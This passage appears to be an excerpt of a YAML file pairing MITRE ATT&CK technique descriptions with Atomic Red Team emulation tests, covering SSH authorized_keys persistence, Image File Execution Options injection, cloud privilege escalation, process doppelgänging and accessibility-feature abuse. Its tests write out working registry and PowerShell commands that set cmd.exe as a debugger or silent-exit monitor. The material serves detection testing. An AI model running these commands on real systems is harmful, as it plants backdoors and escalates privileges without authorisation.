created: '2020-06-24T12:42:35.144Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1098/004
external_id: T1098.004
- source_name: Venafi SSH Key Abuse
description: 'Blachman, Y. (2020, April 22). Growing Abuse of SSH Keys: Commodity
Malware Campaigns Now Equipped with SSH Capabilities. Retrieved June 24,
2020.'
url: https://www.venafi.com/blog/growing-abuse-ssh-keys-commodity-malware-campaigns-now-equipped-ssh-capabilities
- source_name: Broadcom ESXi SSH
description: Broadcom. (2024, December 12). Allowing SSH access to VMware
vSphere ESXi/ESX hosts with public/private key authentication. Retrieved
March 26, 2025.
url: https://knowledge.broadcom.com/external/article/313767/allowing-ssh-access-to-vmware-vsphere-es.html
- source_name: Google Cloud Privilege Escalation
description: Chris Moberly. (2020, February 12). Tutorial on privilege escalation
and post exploitation tactics in Google Cloud Platform environments. Retrieved
April 1, 2022.
url: https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/
- source_name: cisco_ip_ssh_pubkey_ch_cmd
description: Cisco. (2021, August 23). ip ssh pubkey-chain. Retrieved July
13, 2022.
url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/d1/sec-d1-cr-book/sec-cr-i3.html#wp1254331478
- source_name: Cybereason Linux Exim Worm
description: Cybereason Nocturnus. (2019, June 13). New Pervasive Worm Exploiting
Linux Exim Server Vulnerability. Retrieved June 24, 2020.
url: https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability
- source_name: Google Cloud Add Metadata
description: Google Cloud. (2022, March 31). gcloud compute instances add-metadata.
Retrieved April 1, 2022.
url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/add-metadata
- source_name: Azure Update Virtual Machines
description: Microsoft. (n.d.). Virtual Machines - Update. Retrieved April
1, 2022.
url: https://docs.microsoft.com/en-us/rest/api/compute/virtual-machines/update
- source_name: SSH Authorized Keys
description: ssh.com. (n.d.). Authorized_keys File in SSH. Retrieved June
24, 2020.
url: https://www.ssh.com/ssh/authorized_keys/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:55.005Z'
name: SSH Authorized Keys
description: "Adversaries may modify the SSH authorized_keys file
to maintain persistence on a victim host. Linux distributions, macOS, and
ESXi hypervisors commonly use key-based authentication to secure the authentication
process of SSH sessions for remote management. The authorized_keys
file in SSH specifies the SSH keys that can be used for logging into the user
account for which the file is configured. This file is usually found in the
user's home directory under <user-home>/.ssh/authorized_keys
(or, on ESXi, `/etc/ssh/keys-/authorized_keys`).(Citation: SSH Authorized
Keys) Users may edit the system’s SSH config file to modify the directives
`PubkeyAuthentication` and `RSAAuthentication` to the value `yes` to ensure
public key and RSA authentication are enabled, as well as modify the directive
`PermitRootLogin` to the value `yes` to enable root authentication via SSH.(Citation:
Broadcom ESXi SSH) The SSH config file is usually located under /etc/ssh/sshd_config.\n\nAdversaries
may modify SSH authorized_keys files directly with scripts or
shell commands to add their own adversary-supplied public keys. In cloud environments,
adversaries may be able to modify the SSH authorized_keys file of a particular
virtual machine via the command line interface or rest API. For example, by
using the Google Cloud CLI’s “add-metadata” command an adversary may add SSH
keys to a user account.(Citation: Google Cloud Add Metadata)(Citation: Google
Cloud Privilege Escalation) Similarly, in Azure, an adversary may update the
authorized_keys file of a virtual machine via a PATCH request to the API.(Citation:
Azure Update Virtual Machines) This ensures that an adversary possessing the
corresponding private key may log in as an existing user via SSH.(Citation:
Venafi SSH Key Abuse)(Citation: Cybereason Linux Exim Worm) It may also lead
to privilege escalation where the virtual machine or instance has distinct
permissions from the requesting user.\n\nWhere authorized_keys files are modified
via cloud APIs or command line interfaces, an adversary may achieve privilege
escalation on the target virtual machine if they add a key to a higher-privileged
user. \n\nSSH keys can also be added to accounts on network devices, such
as with the `ip ssh pubkey-chain` [Network Device CLI](https://attack.mitre.org/techniques/T1059/008)
command.(Citation: cisco_ip_ssh_pubkey_ch_cmd)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Tony Lambert, Red Canary
- Dror Alon, Palo Alto Networks
- Or Kliger, Palo Alto Networks
- Austin Clark, @c2defense
- Arad Inbar, Fidelis Security
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- IaaS
- Network Devices
- ESXi
x_mitre_version: '1.4'
identifier: T1098.004
atomic_tests:
- name: Modify SSH Authorized Keys
auto_generated_guid: 342cc723-127c-4d3a-8292-9c0c6b4ecadc
description: "Modify contents of /.ssh/authorized_keys to maintain
persistence on victim host. \nIf the user is able to save the same contents
in the authorized_keys file, it shows user can modify the file.\n"
supported_platforms:
- linux
- macos
executor:
name: sh
elevation_required: false
command: 'if [ -f ~/.ssh/authorized_keys ]; then ssh_authorized_keys=$(cat
~/.ssh/authorized_keys); echo "$ssh_authorized_keys" > ~/.ssh/authorized_keys;
fi;
'
cleanup_command: 'unset ssh_authorized_keys
'
T1546.012:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--6d4a7fb3-5a24-42be-ae61-6728a2b581f6
created: '2020-01-24T15:05:58.384Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1546/012
external_id: T1546.012
- source_name: FSecure Hupigon
description: FSecure. (n.d.). Backdoor - W32/Hupigon.EMV - Threat Description.
Retrieved December 18, 2017.
url: https://www.f-secure.com/v-descs/backdoor_w32_hupigon_emv.shtml
- source_name: Elastic Process Injection July 2017
description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- source_name: Microsoft Silent Process Exit NOV 2017
description: Marshall, D. & Griffin, S. (2017, November 28). Monitoring Silent
Process Exit. Retrieved June 27, 2018.
url: https://docs.microsoft.com/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit
- source_name: Microsoft GFlags Mar 2017
description: Microsoft. (2017, May 23). GFlags Overview. Retrieved December
18, 2017.
url: https://docs.microsoft.com/windows-hardware/drivers/debugger/gflags-overview
- source_name: Oddvar Moe IFEO APR 2018
description: Moe, O. (2018, April 10). Persistence using GlobalFlags in Image
File Execution Options - Hidden from Autoruns.exe. Retrieved June 27, 2018.
url: https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/
- source_name: Microsoft Dev Blog IFEO Mar 2010
description: Shanbhag, M. (2010, March 24). Image File Execution Options (IFEO).
Retrieved December 18, 2017.
url: https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/
- source_name: Symantec Ushedix June 2008
description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
18, 2017.
url: https://www.symantec.com/security_response/writeup.jsp?docid=2008-062807-2501-99&tabid=2
- source_name: Tilbury 2014
description: Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse.
Retrieved November 17, 2024.
url: https://web.archive.org/web/20200730053039/https://www.crowdstrike.com/blog/registry-analysis-with-crowdresponse/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:55.526Z'
name: 'Event Triggered Execution: Image File Execution Options Injection'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe). (Citation: Microsoft Dev Blog IFEO Mar 2010)
IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as Debugger values in the Registry under HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ where <executable> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)
IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)
Similar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation.
Malware may also use IFEO to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Oddvar Moe, @oddvarmoe
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
identifier: T1546.012
atomic_tests:
- name: IFEO Add Debugger
auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8
description: 'Leverage Global Flags Settings
'
supported_platforms:
- windows
input_arguments:
target_binary:
description: Binary To Attach To
type: path
default: calc.exe
payload_binary:
description: Binary To Execute
type: path
default: C:\Windows\System32\cmd.exe
executor:
command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
'
cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger
/f >nul 2>&1
'
name: command_prompt
elevation_required: true
- name: IFEO Global Flags
auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1
description: 'Leverage Global Flags Settings
'
supported_platforms:
- windows
input_arguments:
target_binary:
description: Binary To Attach To
type: path
default: notepad.exe
payload_binary:
description: Binary To Execute
type: path
default: C:\Windows\System32\cmd.exe
executor:
command: |
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v GlobalFlag /t REG_DWORD /d 512
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /t REG_DWORD /d 1
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /d "#{payload_binary}"
cleanup_command: |
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v GlobalFlag /f >nul 2>&1
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /f >nul 2>&1
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /f >nul 2>&1
name: command_prompt
elevation_required: true
- name: GlobalFlags in Image File Execution Options
auto_generated_guid: 13117939-c9b2-4a43-999e-0a543df92f0d
description: "The following Atomic Test will create a GlobalFlag key under Image
File Execution Options, also a SilentProcessExit Key with ReportingMode and
MonitorProcess values. This test is similar to a recent CanaryToken that will
generate an EventCode 3000 in the Application log when a command, whoami.exe
for example, is executed.\nUpon running Whoami.exe, a command shell will spawn
and start calc.exe based on the MonitorProcess value. \nUpon successful execution,
powershell will modify the registry and spawn calc.exe. An event 3000 will
generate in the Application log.\n"
supported_platforms:
- windows
input_arguments:
process:
description: 'Process to monitor
'
type: string
default: whoami.exe
cmd_to_run:
description: 'Command to execute
'
type: string
default: cmd.exe /c calc.exe
executor:
command: "$Name = \"GlobalFlag\"\n$Value = \"512\"\n$registryPath = \"HKLM:\\SOFTWARE\\Microsoft\\Windows
NT\\CurrentVersion\\Image File Execution Options\\#{process}\"\nNew-Item
-Path $registryPath -Force\nNew-ItemProperty -Path $registryPath -Name $Name
-Value $Value -PropertyType DWord -Force\n$Name = \"ReportingMode\"\n$Value
= \"1\"\n$SilentProcessExit = \"HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{process}\"\nNew-Item
-Path $SilentProcessExit -Force\nNew-ItemProperty -Path $SilentProcessExit
-Name $Name -Value $Value -PropertyType DWord -Force \n\n$Name = \"MonitorProcess\"\n$Value
= \"#{cmd_to_run}\"\nNew-ItemProperty -Path $SilentProcessExit -Name $Name
-Value $Value -PropertyType String -Force\nStart-Process whoami.exe\n"
cleanup_command: "$SilentProcessExit = \"HKLM:\\SOFTWARE\\Microsoft\\Windows
NT\\CurrentVersion\\SilentProcessExit\\#{process}\" \nRemove-Item $SilentProcessExit
-force\n$registryPath = \"HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image
File Execution Options\\#{process}\"\nRemove-Item $registryPath -force\n"
name: powershell
elevation_required: true
T1548.005:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--6fa224c7-5091-4595-bf15-3fc9fe2f2c7c
created: '2023-07-10T16:37:15.672Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1548/005
external_id: T1548.005
- source_name: AWS PassRole
description: AWS. (n.d.). Granting a user permissions to pass a role to an
AWS service. Retrieved July 10, 2023.
url: https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_passrole.html
- source_name: CrowdStrike StellarParticle January 2022
description: 'CrowdStrike. (2022, January 27). Early Bird Catches the Wormhole:
Observations from the StellarParticle Campaign. Retrieved February 7, 2022.'
url: https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/
- source_name: Google Cloud Just in Time Access 2023
description: Google Cloud. (n.d.). Manage just-in-time privileged access to
projects. Retrieved September 21, 2023.
url: https://cloud.google.com/architecture/manage-just-in-time-privileged-access-to-project
- source_name: Google Cloud Service Account Authentication Roles
description: Google Cloud. (n.d.). Roles for service account authentication.
Retrieved July 10, 2023.
url: https://cloud.google.com/iam/docs/service-account-permissions
- source_name: Microsoft Impersonation and EWS in Exchange
description: Microsoft. (2022, September 13). Impersonation and EWS in Exchange.
Retrieved July 10, 2023.
url: https://learn.microsoft.com/en-us/exchange/client-developer/exchange-web-services/impersonation-and-ews-in-exchange
- source_name: Azure Just in Time Access 2023
description: Microsoft. (2023, August 29). Configure and approve just-in-time
access for Azure Managed Applications. Retrieved September 21, 2023.
url: https://learn.microsoft.com/en-us/azure/azure-resource-manager/managed-applications/approve-just-in-time-access
- source_name: Rhino Security Labs AWS Privilege Escalation
description: Spencer Gietzen. (n.d.). AWS IAM Privilege Escalation – Methods
and Mitigation. Retrieved May 27, 2022.
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
- source_name: Rhino Google Cloud Privilege Escalation
description: Spencer Gietzen. (n.d.). Privilege Escalation in Google Cloud
Platform – Part 1 (IAM). Retrieved September 21, 2023.
url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
- source_name: Hunters Domain Wide Delegation Google Workspace 2023
description: 'Yonatan Khanashvilli. (2023, November 28). DeleFriend: Severe
design flaw in Domain Wide Delegation could leave Google Workspace vulnerable
for takeover. Retrieved January 16, 2024.'
url: https://www.hunters.security/en/blog/delefriend-a-newly-discovered-design-flaw-in-domain-wide-delegation-could-leave-google-workspace-vulnerable-for-takeover
- source_name: Palo Alto Unit 42 Google Workspace Domain Wide Delegation 2023
description: Zohar Zigdon. (2023, November 30). Exploring a Critical Risk
in Google Workspace's Domain-Wide Delegation Feature. Retrieved January
16, 2024.
url: https://unit42.paloaltonetworks.com/critical-risk-in-google-workspace-delegation-feature/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T23:15:17.608Z'
name: Temporary Elevated Cloud Access
description: "Adversaries may abuse permission configurations that allow them
to gain temporarily elevated access to cloud resources. Many cloud environments
allow administrators to grant user or service accounts permission to request
just-in-time access to roles, impersonate other accounts, pass roles onto
resources and services, or otherwise gain short-term access to a set of privileges
that may be distinct from their own. \n\nJust-in-time access is a mechanism
for granting additional roles to cloud accounts in a granular, temporary manner.
This allows accounts to operate with only the permissions they need on a daily
basis, and to request additional permissions as necessary. Sometimes just-in-time
access requests are configured to require manual approval, while other times
the desired permissions are automatically granted.(Citation: Azure Just in
Time Access 2023)\n\nAccount impersonation allows user or service accounts
to temporarily act with the permissions of another account. For example, in
GCP users with the `iam.serviceAccountTokenCreator` role can create temporary
access tokens or sign arbitrary payloads with the permissions of a service
account, while service accounts with domain-wide delegation permission are
permitted to impersonate Google Workspace accounts.(Citation: Google Cloud
Service Account Authentication Roles)(Citation: Hunters Domain Wide Delegation
Google Workspace 2023)(Citation: Google Cloud Just in Time Access 2023)(Citation:
Palo Alto Unit 42 Google Workspace Domain Wide Delegation 2023) In Exchange
Online, the `ApplicationImpersonation` role allows a service account to use
the permissions associated with specified user accounts.(Citation: Microsoft
Impersonation and EWS in Exchange) \n\nMany cloud environments also include
mechanisms for users to pass roles to resources that allow them to perform
tasks and authenticate to other services. While the user that creates the
resource does not directly assume the role they pass to it, they may still
be able to take advantage of the role's access -- for example, by configuring
the resource to perform certain actions with the permissions it has been granted.
In AWS, users with the `PassRole` permission can allow a service they create
to assume a given role, while in GCP, users with the `iam.serviceAccountUser`
role can attach a service account to a resource.(Citation: AWS PassRole)(Citation:
Google Cloud Service Account Authentication Roles)\n\nWhile users require
specific role assignments in order to use any of these features, cloud administrators
may misconfigure permissions. This could result in escalation paths that allow
adversaries to gain access to resources beyond what was originally intended.(Citation:
Rhino Google Cloud Privilege Escalation)(Citation: Rhino Security Labs AWS
Privilege Escalation)\n\n**Note:** this technique is distinct from [Additional
Cloud Roles](https://attack.mitre.org/techniques/T1098/003), which involves
assigning permanent roles to accounts rather than abusing existing permissions
structures to gain temporarily elevated access to resources. However, adversaries
that compromise a sufficiently privileged account may grant another account
they control [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003)
that would allow them to also abuse these features. This may also allow for
greater stealth than would be had by directly using the highly privileged
account, especially when logs do not clarify when role impersonation is taking
place.(Citation: CrowdStrike StellarParticle January 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Arad Inbar, Fidelis Security
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- Office Suite
- Identity Provider
x_mitre_version: '1.2'
atomic_tests: []
T1055.013:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--7007935a-a8a7-4c0b-bd98-4e85be8ed197
created: '2020-01-14T17:19:50.978Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1055/013
external_id: T1055.013
- source_name: Microsoft TxF
description: Microsoft. (n.d.). Transactional NTFS (TxF). Retrieved December
20, 2017.
url: https://msdn.microsoft.com/library/windows/desktop/bb968806.aspx
- source_name: Microsoft Basic TxF Concepts
description: Microsoft. (n.d.). Basic TxF Concepts. Retrieved December 20,
2017.
url: https://msdn.microsoft.com/library/windows/desktop/dd979526.aspx
- source_name: Microsoft Where to use TxF
description: Microsoft. (n.d.). When to Use Transactional NTFS. Retrieved
December 20, 2017.
url: https://msdn.microsoft.com/library/windows/desktop/aa365738.aspx
- source_name: BlackHat Process Doppelgänging Dec 2017
description: 'Liberman, T. & Kogan, E. (2017, December 7). Lost in Transaction:
Process Doppelgänging. Retrieved December 20, 2017.'
url: https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf
- source_name: hasherezade Process Doppelgänging Dec 2017
description: hasherezade. (2017, December 18). Process Doppelgänging – a new
way to impersonate a process. Retrieved December 20, 2017.
url: https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/
- source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
December 20, 2017.
url: https://msdn.microsoft.com/library/windows/hardware/ff559951.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:56.422Z'
name: Process Doppelgänging
description: "Adversaries may inject malicious code into process via process
doppelgänging in order to evade process-based defenses as well as possibly
elevate privileges. Process doppelgänging is a method of executing arbitrary
code in the address space of a separate live process. \n\nWindows Transactional
NTFS (TxF) was introduced in Vista as a method to perform safe file operations.
(Citation: Microsoft TxF) To ensure data integrity, TxF enables only one transacted
handle to write to a file at a given time. Until the write handle transaction
is terminated, all other handles are isolated from the writer and may only
read the committed version of the file that existed at the time the handle
was opened. (Citation: Microsoft Basic TxF Concepts) To avoid corruption,
TxF performs an automatic rollback if the system or application fails during
a write transaction. (Citation: Microsoft Where to use TxF)\n\nAlthough deprecated,
the TxF application programming interface (API) is still enabled as of Windows
10. (Citation: BlackHat Process Doppelgänging Dec 2017)\n\nAdversaries may
abuse TxF to a perform a file-less variation of [Process Injection](https://attack.mitre.org/techniques/T1055).
Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012),
process doppelgänging involves replacing the memory of a legitimate process,
enabling the veiled execution of malicious code that may evade defenses and
detection. Process doppelgänging's use of TxF also avoids the use of highly-monitored
API functions such as NtUnmapViewOfSection, VirtualProtectEx,
and SetThreadContext. (Citation: BlackHat Process Doppelgänging
Dec 2017)\n\nProcess Doppelgänging is implemented in 4 steps (Citation: BlackHat
Process Doppelgänging Dec 2017):\n\n* Transact – Create a TxF transaction
using a legitimate executable then overwrite the file with malicious code.
These changes will be isolated and only visible within the context of the
transaction.\n* Load – Create a shared section of memory and load the malicious
executable.\n* Rollback – Undo changes to original executable, effectively
removing malicious code from the file system.\n* Animate – Create a process
from the tainted section of memory and initiate execution.\n\nThis behavior
will likely not result in elevated privileges since the injected process was
spawned from (and thus inherits the security context) of the injecting process.
However, execution via process doppelgänging may evade detection from security
products since the execution is masked under a legitimate process. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
atomic_tests: []
T1574.005:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--70d81154-b187-45f9-8ec5-295d01255979
created: '2020-03-13T11:12:18.558Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/005
external_id: T1574.005
- source_name: mozilla_sec_adv_2012
description: Robert Kugler. (2012, November 20). Mozilla Foundation Security
Advisory 2012-98. Retrieved March 10, 2017.
url: https://www.mozilla.org/en-US/security/advisories/mfsa2012-98/
- source_name: Executable Installers are Vulnerable
description: 'Stefan Kanthak. (2015, December 8). Executable installers are
vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
of privilege. Retrieved December 4, 2014.'
url: https://seclists.org/fulldisclosure/2015/Dec/34
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:56.875Z'
name: Executable Installer File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL](https://attack.mitre.org/techniques/T1574/001) search order hijacking.
Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Stefan Kanthak
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
atomic_tests: []
T1546.008:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--70e52b04-2a0c-4cea-9d18-7149f1df9dc5
created: '2020-01-24T14:32:40.315Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1546/008
external_id: T1546.008
- source_name: Narrator Accessibility Abuse
description: Comi, G. (2019, October 19). Abusing Windows 10 Narrator's 'Feedback-Hub'
URI for Fileless Persistence. Retrieved April 28, 2020.
url: https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html
- source_name: FireEye Hikit Rootkit
description: 'Glyer, C., Kazanciyan, R. (2012, August 20). The “Hikit” Rootkit:
Advanced and Persistent Attack Techniques (Part 1). Retrieved November 17,
2024.'
url: https://web.archive.org/web/20190216180458/https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html
- source_name: DEFCON2016 Sticky Keys
description: Maldonado, D., McGuffin, T. (2016, August 6). Sticky Keys to
the Kingdom. Retrieved July 5, 2017.
url: https://www.slideshare.net/DennisMaldonado5/sticky-keys-to-the-kingdom
- source_name: Tilbury 2014
description: Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse.
Retrieved November 17, 2024.
url: https://web.archive.org/web/20200730053039/https://www.crowdstrike.com/blog/registry-analysis-with-crowdresponse/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:56.964Z'
name: 'Event Triggered Execution: Accessibility Features'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
Two common accessibility programs are C:\Windows\System32\sethc.exe, launched when the shift key is pressed five times and C:\Windows\System32\utilman.exe, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit)
Depending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in %systemdir%\, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012) debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced.
